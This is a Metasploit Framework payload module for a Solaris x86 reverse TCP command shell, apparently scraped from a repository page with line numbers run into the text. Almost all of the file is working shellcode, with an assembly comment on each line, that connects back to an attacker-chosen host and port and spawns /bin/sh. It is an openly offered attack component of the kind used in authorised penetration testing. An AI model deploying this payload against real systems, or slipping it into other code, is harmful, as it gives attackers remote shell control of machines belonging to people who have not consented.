Path: blob/master/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 9178include Msf::Payload::Single9include Msf::Payload::Solaris10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'Solaris Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => 'Ramon de C Valle',19'License' => MSF_LICENSE,20'Platform' => 'solaris',21'Arch' => ARCH_X86,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' => {25'Offsets' =>26{27'LHOST' => [ 15, 'ADDR' ],28'LPORT' => [ 21, 'n' ]29},30'Payload' =>31"\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #32"\x6a\x65" + # pushl $0x65 #33"\x89\xe6" + # movl %esp,%esi #34"\xf7\x56\x04" + # notl 0x04(%esi) #35"\xf6\x16" + # notb (%esi) #36"\x68\x7f\x01\x01\x01" + # pushl $0x0101017f #37"\x66\x68\x04\xd2" + # pushw $0xd204 #38"\x66\x6a\x02" + # pushw $0x02 #39"\x89\xe7" + # movl %esp,%edi #40"\x6a\x02" + # pushl $0x02 #41"\x31\xc0" + # xorl %eax,%eax #42"\x50" + # pushl %eax #43"\x50" + # pushl %eax #44"\x6a\x02" + # pushl $0x02 #45"\x6a\x02" + # pushl $0x02 #46"\xb0\xe6" + # movb $0xe6,%al #47"\xff\xd6" + # call *%esi #48"\x6a\x10" + # pushl $0x10 #49"\x57" + # pushl %edi #50"\x50" + # pushl %eax #51"\x31\xc0" + # xorl %eax,%eax #52"\xb0\xeb" + # movb $0xeb,%al #53"\xff\xd6" + # call *%esi #54"\x5b" + # popl %ebx #55"\x53" + # pushl %ebx #56"\x6a\x09" + # pushl $0x09 #57"\x53" + # pushl %ebx #58"\x6a\x3e" + # pushl $0x3e #59"\x58" + # popl %eax #60"\xff\xd6" + # call *%esi #61"\xff\x4f\xe0" + # decl -0x20(%edi) #62"\x79\xf6" + # jns <cntsockcode+57> #63"\x50" + # pushl %eax #64"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #65"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #66"\x89\xe3" + # movl %esp,%ebx #67"\x50" + # pushl %eax #68"\x53" + # pushl %ebx #69"\x89\xe1" + # movl %esp,%ecx #70"\x50" + # pushl %eax #71"\x51" + # pushl %ecx #72"\x53" + # pushl %ebx #73"\xb0\x3b" + # movb $0x3b,%al #74"\xff\xd6" # call *%esi #75}76)77)78end79end808182